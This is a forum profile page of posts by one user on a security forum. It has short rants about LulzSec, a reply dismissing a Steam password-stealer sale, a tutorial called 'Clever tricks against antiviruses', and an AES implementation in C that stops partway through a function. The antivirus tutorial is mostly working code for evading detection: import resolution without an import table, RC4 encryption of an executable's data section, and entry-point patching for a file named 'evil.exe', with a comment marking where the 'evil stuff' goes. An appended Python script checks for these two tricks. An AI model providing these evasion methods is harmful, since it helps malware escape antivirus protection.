Everything posted by Nytro
Posts: 18713. Days Won: 701.
-
I already gave my opinion in another topic. There were some attacks on various sites that had already been claimed by "x" and "y", and then these losers wake up and say that they are the "hackers". Same with pron.com, for example: I think it was first found by our own Tinko, and then these losers wake up and claim they found it. Actually they don't even claim it, it's just that some stinking pieces of crap from the press (screw the press) wake up and promote them,
-
DDOS. Losers. It's still possible that they had nothing to do with it. Script-kiddies. For example, they posted a phone number on Twitter, the losers called it and the calls were redirected to various call centers of certain companies. How "1337"... Kids with no future.
-
Probably: - Florin Salam - "Am norocul scris in frunte" (I've got luck written on my forehead) :->
-
Steam password stealing script, for sale
Nytro replied to Necunoscut's topic in Cosul de gunoi (Trash can)
It takes us 2 minutes to make such a page, why would we pay for it? Yes, you've come to the wrong place, you won't find customers here for such junk.
-
JavaScript PDF Reader
Interesting idea... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js
-
The Art of the Cyberwar
The development of new technologies, together with military interest in them and developed countries' dependence on existing technology, sets up a scenario where cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence have developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc., forming true experts in cyber warfare, called cyberwarriors. No one doubts that future wars will be decided not on land, sea or air, but in cyberspace. The soldiers will carry neither weapons nor shields, but knowledge, and will deploy applications that wage war with viruses, disabling the enemy's critical, technologically dependent systems. This is the scenario the world is moving toward now, a scenario of technological dependence, where countries with more traditional military strength will lose the ability to wage war against countries highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, based on the philosophy of Sun Tzu in The Art of War, adapting his teachings to the technological scenario in which we live, so that we can obtain a modern compendium: The Art of Cyberwar.
Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf
-
I don't remember exactly what and how, but long before that I had seen some "attacks" already "signed" by someone or other, which they then decided to attribute to themselves. And they did this many times. Same with PlayStation: the data that was made public first appeared in other places, and then they woke up claiming that they were the ones who hacked Sony's sites... And now they keep taking credit for whatever happens around the world. They are losers.
-
LulzSec says it hacked U.S. Senate website and Bethesda gaming servers
Nytro replied to Fi8sVrs's topic in Stiri securitate (Security news)
LulzSec say a lot. They say they "hacked" everything that has been "hacked" for a long time now. They are losers.
-
Clever tricks against antiviruses

I bet you have come across some software you've made which you didn't want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section.

Anti-viruses rely heavily on their heuristics if all other (signature) scans fail. The patterns they search for in your executable are the functions being imported, and the order they are being called.

No imports!

Having no import table is relatively easy. There are however some functions I haven't imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are:

1. Get the kernel32 module base address (kernel32.dll is always loaded when the process is started, and so is ntdll.dll).
2. Make your own GetProcAddress.
3. Use it to find LoadLibrary's address, so that you can load other DLLs.
4. Make the functions usable in a practical way, so that you don't have to make a prototype for each of the functions that you will load.

1. Get kernel32's base address

The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules' initialization order).

Code:

```c
void __declspec(naked) *kernel_addr()
{
    // Get kernel32 base address through PEB (initialization order)
    __asm {
        mov eax, fs:[0x30]  // PEB address
        mov eax, [eax+0x0c] // PEB->Ldr
        mov eax, [eax+0x1c] // Ldr.InInitializationOrderModuleList (ntdll)
        mov eax, [eax]      // [ntdll].Flink (kernel32)
        mov eax, [eax+0x08] // kernel32 base address
        ret
    }
}
```

You can use whichever method you want, really, as long as the end result is the kernel32 base address.

2. Our own GetProcAddress

If you have ever had to deal with the PE format, you'd know that the exports have three main structures. These are the address table, the name table, and the ordinal table.

The address table is simply just an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module. The name table is another array with RVAs to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names' index doesn't always correspond to the functions' index. To retrieve the index, you use the ordinal table. The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value of 0. So, the ordinal table is just another table, which maps a name to a function, using the name's index to retrieve the function's index.

```c
void *my_gpa(HMODULE modl, char *fname)
{
    unsigned long modb = (unsigned long)modl;
    IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb;
    IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew);
    // DataDirectory[0] is the export directory
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress);
    unsigned int i;

    for(i = 0; i < ied->NumberOfNames; i++) {
        const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(void *)))+modb;
        if(!strcmp(fname, nn)) {
            unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short));
            return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(void *))+modb);
        }
    }

    return NULL;
}
```

In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There's some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address and a function name, and returns a function address.

We iterate through each entry in the name table. The string is retrieved through nn: (RVA of the table + base address + i*4) + base address. Each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i'th entry, we add i*4. Once we've gotten to the i'th entry and dereferenced it, we add the base address to get the string's address. If the names are the same, get the ordinal the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then, using the ordinal as an index, retrieve the address of the function and return it.

3. Getting LoadLibrary's address

Easiest step. The code speaks for itself:

```c
HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName);
dyn_ll = my_gpa(kern, "LoadLibraryA");
```

4. Making it usable

You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let's make an array of functions for each module we will load, then let's also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock.

```c
// don't forget to specify the correct calling convention
char *fn_kernel[] = {
    "GetEnvironmentVariableA", // 0
    "GetModuleFileNameA",      // 1
    "GetTickCount",            // 2
    "GetLocalTime",            // 3
    "CreateThread",            // 4
    "SetThreadPriority",       // 5
};
unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])();

char *fn_user[] = {
    "MessageBoxA",         // 0
    "GetForegroundWindow", // 1
    "GetWindowTextA",      // 2
};
unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])();

char *fn_wsock[] = {
    "WSAStartup",    // 0
    "send",          // 1
    "connect",       // 2
    "socket",        // 3
    "gethostbyname", // 4
    "closesocket",   // 5
    "recv",          // 6
    "WSACleanup",    // 7
};
unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])();

HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName);

void *my_gpa(HMODULE modl, char *fname)
{
    unsigned long modb = (unsigned long)modl;
    IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb;
    IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew);
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress);
    unsigned int i;

    for(i = 0; i < ied->NumberOfNames; i++) {
        const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(unsigned long)))+modb;
        if(!strcmp(fname, nn)) {
            unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short));
            return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(unsigned long))+modb);
        }
    }

    return NULL;
}

void load_imports()
{
    HMODULE kern, user, wsock;
    unsigned long i;

    kern = kernel_addr();
    dyn_ll = my_gpa(kern, "LoadLibraryA");
    user = dyn_ll("user32.dll");
    wsock = dyn_ll("ws2_32.dll");

    for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++)
        func_kernel[i] = my_gpa(kern, fn_kernel[i]);
    for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++)
        func_user[i] = my_gpa(user, fn_user[i]);
    for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++)
        func_wsock[i] = my_gpa(wsock, fn_wsock[i]);
}

int main(int argc, char *argv[])
{
    WSADATA wsd;

    load_imports();
    // MessageBoxA
    func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK);
    func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup
    // evil stuff here
    func_wsock[7](); // WSACleanup
    return EXIT_SUCCESS;
}
```

Simple.

Encrypting your data section

This method is really easy, and of course it's not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the rc4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself. Code for the encryption program:

```c
#include <windows.h>
#include <imagehlp.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DATA ".data"     // data section's name
#define KEY  "DqHAI5VN"  // encryption key
#define NEW  0x11c8      // new ep rva
#define REP  0x5e4       // offset to patch with the old ep

void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100])
{
    unsigned long i, j;

    for(i = 0; i < 0x100; i++)
        sbox[i] = (unsigned char)i;

    for(j = i = 0; i < 0x100; i++) {
        unsigned char tmp;
        j = (j + sbox[i] + key[i % keylen]) & 0xff;
        tmp = sbox[i];
        sbox[i] = sbox[j];
        sbox[j] = tmp;
    }
}

void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len)
{
    unsigned long i, j;

    i = j = 0;
    while(len--) {
        unsigned char tmp;
        i = (i + 1) & 0xff;
        j = (j + sbox[i]) & 0xff;
        tmp = sbox[i];
        sbox[i] = sbox[j];
        sbox[j] = tmp;
        // RC4 indexes the output byte mod 256; the article used % 0xff, which never selects sbox[255]
        *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) & 0xff];
    }
}

int main(int argc, char *argv[])
{
    FILE *f = fopen("evil.exe", "r+b");
    IMAGE_DOS_HEADER dosh;
    IMAGE_NT_HEADERS nth;
    IMAGE_SECTION_HEADER sech, dummy;

    if(!f)
        return 1;

    memset(&dummy, 0, sizeof(dummy));
    fread(&dosh, 1, sizeof(dosh), f);
    fseek(f, dosh.e_lfanew, SEEK_SET);
    fread(&nth, 1, sizeof(nth), f);
    fread(&sech, 1, sizeof(sech), f);

    // walk the section headers until the all-zero terminator
    while(memcmp(&sech, &dummy, sizeof(dummy))) {
        if(!strcmp((char *)sech.Name, DATA)) {
            unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData);
            DWORD ep, epaddr;

            // encrypt the raw .data bytes in place
            rc4_ksched((unsigned char *)KEY, 8, sbox);
            fseek(f, sech.PointerToRawData, SEEK_SET);
            fread(rd, 1, sech.SizeOfRawData, f);
            rc4(sbox, rd, rd, sech.SizeOfRawData);
            fseek(f, sech.PointerToRawData, SEEK_SET);
            fwrite(rd, 1, sech.SizeOfRawData, f);
            free(rd);

            // point the entry point at new_ep
            epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew;
            fseek(f, epaddr, SEEK_SET);
            ep = NEW;
            fwrite(&ep, 1, 4, f);

            // patch the placeholder with the old (virtual) entry point
            fseek(f, REP, SEEK_SET);
            ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase;
            fwrite(&ep, 1, 4, f);

            fclose(f);
            return EXIT_SUCCESS;
        }
        fread(&sech, 1, sizeof(sech), f);
    }

    fclose(f);
    return EXIT_FAILURE;
}
```

What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point.

```c
// rc4_ksched() and rc4() from the encryption program are compiled into this executable as well
void decrypt_data(unsigned long mod)
{
    char data[6];
    IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod;
    IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS));
    IMAGE_SECTION_HEADER dummy;

    // the section name and key are built byte by byte so that they do not end up in .data
    data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0;
    memset(&dummy, 0, sizeof(dummy));

    while(memcmp(sech, &dummy, sizeof(dummy))) {
        if(!strcmp((char *)sech->Name, data)) {
            unsigned char sbox[0x100], key[9];
            key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A';
            key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0;
            rc4_ksched(key, 8, sbox);
            rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData);
            return;
        }
        sech++;
    }

    exit(EXIT_FAILURE);
}

void __declspec(naked) *gba()
{
    __asm {
        mov eax, fs:[0x30]  // PEB address
        mov eax, [eax+0x08] // PEB->BaseAddress
        ret
    }
}

void __declspec(naked) new_ep()
{
    // magic is not declared in the article's listing; from this test it is a marker in
    // .data that reads 'x86!' only once the section has been decrypted
    if(*(unsigned long *)magic != 'x86!')
        decrypt_data((unsigned long)gba());
    __asm {
        push 0x41414141 // placeholder, patched with the old entry point
        ret
    }
}
```

And in main:

```c
unsigned long nep_addr;

int main(int argc, char *argv[])
{
    WSADATA wsd;

    nep_addr = (unsigned long)&new_ep;
    load_imports();
    // MessageBoxA
    func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK);
    func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup
    // evil stuff here
    func_wsock[7](); // WSACleanup
    return EXIT_SUCCESS;
}
```

We reference new_ep, because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it.

Here you will have to get some offsets. First compile the executable, and disassemble it. Find the RVA of new_ep, and put it in the encryption program source code. Then find the offset of the placeholder for the old entry point. The instruction will look like push 0x41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the offset of the .text section to it, and there you have your offset. Now put it in the encryption source, compile it, run it, and everything is ready.

Well, that was everything. If you found this article helpful or have a question, feel free to post a comment.

The nicer-formatted article: http://www.x-n2o.com/clever-tricks-against-antiviruses/
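A defender-side counterpart to the two tricks above, added here and not part of the article: a small static triage that flags an executable with an empty import directory and a .data section whose bytes look encrypted (Shannon entropy near 8 bits per byte). The input PE is a constructed minimal PE32 built in memory so the check runs offline; the 7.0-bit threshold is an assumption, to be set from your own baseline of clean binaries.

```python
"""Static triage for the two tricks described above: no import table, and a
.data section that looks encrypted. Added defender-side example; the PE used
as input is constructed in memory, not a real sample."""
import math
import struct
from collections import Counter

IMAGE_DIRECTORY_ENTRY_IMPORT = 1
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Decode only what the heuristics need: the import data directory and
    each section's name and raw bytes (PE32 and PE32+ header layouts)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    dd_off = opt + (96 if magic == PE32_MAGIC else 112)   # start of DataDirectory[]
    import_rva, import_size = struct.unpack_from(
        "<II", image, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    sections = []
    for k in range(nsections):
        hdr = opt + opt_size + 40 * k
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return {"import_rva": import_rva, "import_size": import_size, "sections": sections}


def triage(image: bytes, entropy_threshold: float = 7.0) -> list:
    """Findings for the article's two tricks; an empty list means neither fired.
    The threshold is an assumption, not a published cut-off."""
    pe = parse_pe(image)
    findings = []
    if pe["import_rva"] == 0 and pe["import_size"] == 0:
        findings.append("no import table")
    for name, raw in pe["sections"]:
        if name == ".data" and shannon_entropy(raw) >= entropy_threshold:
            findings.append(".data entropy %.2f" % shannon_entropy(raw))
    return findings


def build_pe(data_section: bytes, with_imports: bool) -> bytes:
    """Constructed minimal PE32 with a .text and a .data section (test fixture only)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    dirs = [(0, 0)] * 16
    if with_imports:
        dirs[IMAGE_DIRECTORY_ENTRY_IMPORT] = (0x2000, 40)   # constructed RVA/size
    opt = struct.pack("<H", PE32_MAGIC) + b"\0" * 94
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    text = b"\xC3" * 16                                       # constructed: 16 x RET
    text_ptr = len(dos) + 4 + len(coff) + len(opt) + 2 * 40
    data_ptr = text_ptr + len(text)

    def section(name, rva, raw, ptr):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), rva, len(raw), ptr,
                           0, 0, 0, 0, 0x40000040)

    headers = dos + b"PE\0\0" + coff + opt
    headers += section(b".text", 0x1000, text, text_ptr)
    headers += section(b".data", 0x2000, data_section, data_ptr)
    return headers + text + data_section
```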
-
AES Explained

Hello people, it's been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand.

What is AES?

AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates on a block of data, instead of a single element per iteration (this element could be a bit or a byte). AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia, especially the links at the bottom; they help in understanding the basic structure of AES.

AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively).

What makes AES so good, you say? The answer would be its security and speed. It's obviously secure since it's been chosen by NIST. Then again, no one has been able to break it. And finally, it's fast because its arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it's also simple and even faster to implement in hardware.

AES Concepts

Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They're basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before everything else? Because if you don't understand this, you won't be able to understand the rest of this article.

Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf

The nicely formatted article: http://www.x-n2o.com/aes-explained/
-
[C] AES Implementation
Author: X-N2O

I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy.

```c
// AES Implementation by X-N2O
// Started: 15:41:35 - 18 Nov 2009
// Finished: 20:03:59 - 21 Nov 2009
// Logarithm, S-Box, and RCON tables are not hardcoded
// Instead they are generated when the program starts
// All of the code below is based from the AES specification
// You can find it at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
// You may use this code as you wish, but do not remove this comment
// This is only a proof of concept, and should not be considered as the most efficient implementation

#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define AES_RPOL    0x011b  // reduction polynomial (x^8 + x^4 + x^3 + x + 1)
#define AES_GEN     0x03    // gf(2^8) generator (x + 1)
#define AES_SBOX_CC 0x63    // S-Box C constant

#define KEY_128 (128/8)
#define KEY_192 (192/8)
#define KEY_256 (256/8)

// gf(2^8) multiplication and inversion through the log/antilog tables
#define aes_mul(a, b) (((a) && (b)) ? g_aes_ilogt[(g_aes_logt[(a)] + g_aes_logt[(b)]) % 0xff] : 0)
#define aes_inv(a)    ((a) ? g_aes_ilogt[0xff - g_aes_logt[(a)]] : 0)

unsigned char g_aes_logt[256], g_aes_ilogt[256];
unsigned char g_aes_sbox[256], g_aes_isbox[256];

typedef struct {
    unsigned char state[4][4];
    int kcol;             // Nk, key length in 32-bit words
    size_t rounds;        // Nr
    uint32_t keysched[];  // expanded key, 4*(Nr+1) words (flexible array member)
} aes_ctx_t;

void init_aes(void);
aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen);
static inline uint32_t aes_subword(uint32_t w);
static inline uint32_t aes_rotword(uint32_t w);
void aes_keyexpansion(aes_ctx_t *ctx);
static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b); // use aes_mul instead
void aes_subbytes(aes_ctx_t *ctx);
void aes_shiftrows(aes_ctx_t *ctx);
void aes_mixcolumns(aes_ctx_t *ctx);
void aes_addroundkey(aes_ctx_t *ctx, int round);
void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
void aes_invsubbytes(aes_ctx_t *ctx);
void aes_invshiftrows(aes_ctx_t *ctx);
void aes_invmixcolumns(aes_ctx_t *ctx);
void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
void aes_free_ctx(aes_ctx_t *ctx);

void init_aes(void)
{
    int i;
    unsigned char gen;

    // build logarithm table and its inverse
    gen = 1;
    for(i = 0; i < 0xff; i++) {
        g_aes_logt[gen] = i;
        g_aes_ilogt[i] = gen;
        gen = aes_mul_manual(gen, AES_GEN);
    }
    // gen is 1 again here (g^255 = 1). The original left g_aes_ilogt[0xff] unset, which is
    // exactly the entry aes_inv(1) reads, and then patched S-Box[1] by hand ("quickhack").
    g_aes_ilogt[0xff] = gen;

    // build S-Box and its inverse
    for(i = 0; i <= 0xff; i++) {
        char bi;
        unsigned char inv = aes_inv(i);
        g_aes_sbox[i] = 0;
        for(bi = 0; bi < 8; bi++) {
            // based on transformation 5.1
            // could also be done with a loop based on the matrix
            g_aes_sbox[i] |= (
                  (inv & (1 << bi) ? 1 : 0)
                ^ (inv & (1 << ((bi+4) & 7)) ? 1 : 0)
                ^ (inv & (1 << ((bi+5) & 7)) ? 1 : 0)
                ^ (inv & (1 << ((bi+6) & 7)) ? 1 : 0)
                ^ (inv & (1 << ((bi+7) & 7)) ? 1 : 0)
                ^ (AES_SBOX_CC & (1 << bi) ? 1 : 0)
            ) << bi;
        }
        g_aes_isbox[g_aes_sbox[i]] = i;
    }
}

aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen)
{
    aes_ctx_t *ctx;
    size_t rounds;
    size_t ks_size;

    switch(keyLen) {
        case 16: // 128-bit key
            rounds = 10;
            break;
        case 24: // 192-bit key
            rounds = 12;
            break;
        case 32: // 256-bit key
            rounds = 14;
            break;
        default: // the original spelled this "defaut:", which made it a label instead of the default case
            return NULL;
    }

    ks_size = 4*(rounds+1)*sizeof(uint32_t);
    ctx = malloc(sizeof(aes_ctx_t)+ks_size);
    if(ctx) {
        ctx->rounds = rounds;
        ctx->kcol = keyLen/4;
        // the key bytes become the first Nk words (little-endian host assumed, see aes_rotword)
        memcpy(ctx->keysched, key, keyLen);
        aes_keyexpansion(ctx);
    }

    return ctx;
}

static inline uint32_t aes_subword(uint32_t w)
{
    return (uint32_t)g_aes_sbox[w & 0x000000ff]
        | ((uint32_t)g_aes_sbox[(w & 0x0000ff00) >> 8] << 8)
        | ((uint32_t)g_aes_sbox[(w & 0x00ff0000) >> 16] << 16)
        | ((uint32_t)g_aes_sbox[(w & 0xff000000) >> 24] << 24);
}

static inline uint32_t aes_rotword(uint32_t w)
{
    // May seem a bit different from the spec
    // It was changed because the 32-bit word is represented with little-endian convention on x86
    // Should not depend on architecture, but this is only a POC
    return ((w & 0x000000ff) << 24) | ((w & 0x0000ff00) >> 8) | ((w & 0x00ff0000) >> 8) | ((w & 0xff000000) >> 8);
}

void aes_keyexpansion(aes_ctx_t *ctx)
{
    uint32_t temp;
    uint32_t rcon;
    register int i;

    rcon = 0x00000001;
    for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) {
        temp = ctx->keysched[i-1];
        if(!(i%ctx->kcol)) {
            temp = aes_subword(aes_rotword(temp)) ^ rcon;
            rcon = aes_mul(rcon, 2);
        } else if(ctx->kcol > 6 && i%ctx->kcol == 4)
            temp = aes_subword(temp);
        ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp;
    }
}

static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b)
{
    register unsigned short ac;
    register unsigned char ret;

    ac = a;
    ret = 0;
    while(b) {
        if(b & 0x01)
            ret ^= ac;
        ac <<= 1;
        b >>= 1;
        if(ac & 0x0100)
            ac ^= AES_RPOL;
    }

    return ret;
}

void aes_subbytes(aes_ctx_t *ctx)
{
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;
        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]];
    }
}

void aes_shiftrows(aes_ctx_t *ctx)
{
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;
        x = i & 0x03;
        y = i >> 2;
        nstate[x][y] = ctx->state[x][(y+x) & 0x03];
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_mixcolumns(aes_ctx_t *ctx)
{
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 4; i++) {
        nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^ aes_mul(0x03, ctx->state[1][i]) ^ ctx->state[2][i] ^ ctx->state[3][i];
        nstate[1][i] = ctx->state[0][i] ^ aes_mul(0x02, ctx->state[1][i]) ^ aes_mul(0x03, ctx->state[2][i]) ^ ctx->state[3][i];
        nstate[2][i] = ctx->state[0][i] ^ ctx->state[1][i] ^ aes_mul(0x02, ctx->state[2][i]) ^ aes_mul(0x03, ctx->state[3][i]);
        nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^ ctx->state[1][i] ^ ctx->state[2][i] ^ aes_mul(0x02, ctx->state[3][i]);
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_addroundkey(aes_ctx_t *ctx, int round)
{
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;
        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8));
    }
}

void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16])
{
    int i;

    // copy input to state
    for(i = 0; i < 16; i++)
        ctx->state[i & 0x03][i >> 2] = input[i];

    aes_addroundkey(ctx, 0);
    for(i = 1; i < ctx->rounds; i++) {
        aes_subbytes(ctx);
        aes_shiftrows(ctx);
        aes_mixcolumns(ctx);
        aes_addroundkey(ctx, i);
    }
    aes_subbytes(ctx);
    aes_shiftrows(ctx);
    aes_addroundkey(ctx, ctx->rounds);

    // copy state to output
    for(i = 0; i < 16; i++)
        output[i] = ctx->state[i & 0x03][i >> 2];
}

void aes_invshiftrows(aes_ctx_t *ctx)
{
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;
        x = i & 0x03;
        y = i >> 2;
        nstate[x][(y+x) & 0x03] = ctx->state[x][y];
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_invsubbytes(aes_ctx_t *ctx)
{
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;
        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]];
    }
}

void aes_invmixcolumns(aes_ctx_t *ctx)
{
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 4; i++) {
        nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^ aes_mul(0x0b, ctx->state[1][i]) ^ aes_mul(0x0d, ctx->state[2][i]) ^ aes_mul(0x09, ctx->state[3][i]);
        nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^ aes_mul(0x0e, ctx->state[1][i]) ^ aes_mul(0x0b, ctx->state[2][i]) ^ aes_mul(0x0d, ctx->state[3][i]);
        nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^ aes_mul(0x09, ctx->state[1][i]) ^ aes_mul(0x0e, ctx->state[2][i]) ^ aes_mul(0x0b, ctx->state[3][i]);
        nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^ aes_mul(0x0d, ctx->state[1][i]) ^ aes_mul(0x09, ctx->state[2][i]) ^ aes_mul(0x0e, ctx->state[3][i]);
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16])
{
    int i;

    // copy input to state
    for(i = 0; i < 16; i++)
        ctx->state[i & 0x03][i >> 2] = input[i];

    aes_addroundkey(ctx, ctx->rounds);
    for(i = ctx->rounds-1; i >= 1; i--) {
        aes_invshiftrows(ctx);
        aes_invsubbytes(ctx);
        aes_addroundkey(ctx, i);
        aes_invmixcolumns(ctx);
    }
    aes_invshiftrows(ctx);
    aes_invsubbytes(ctx);
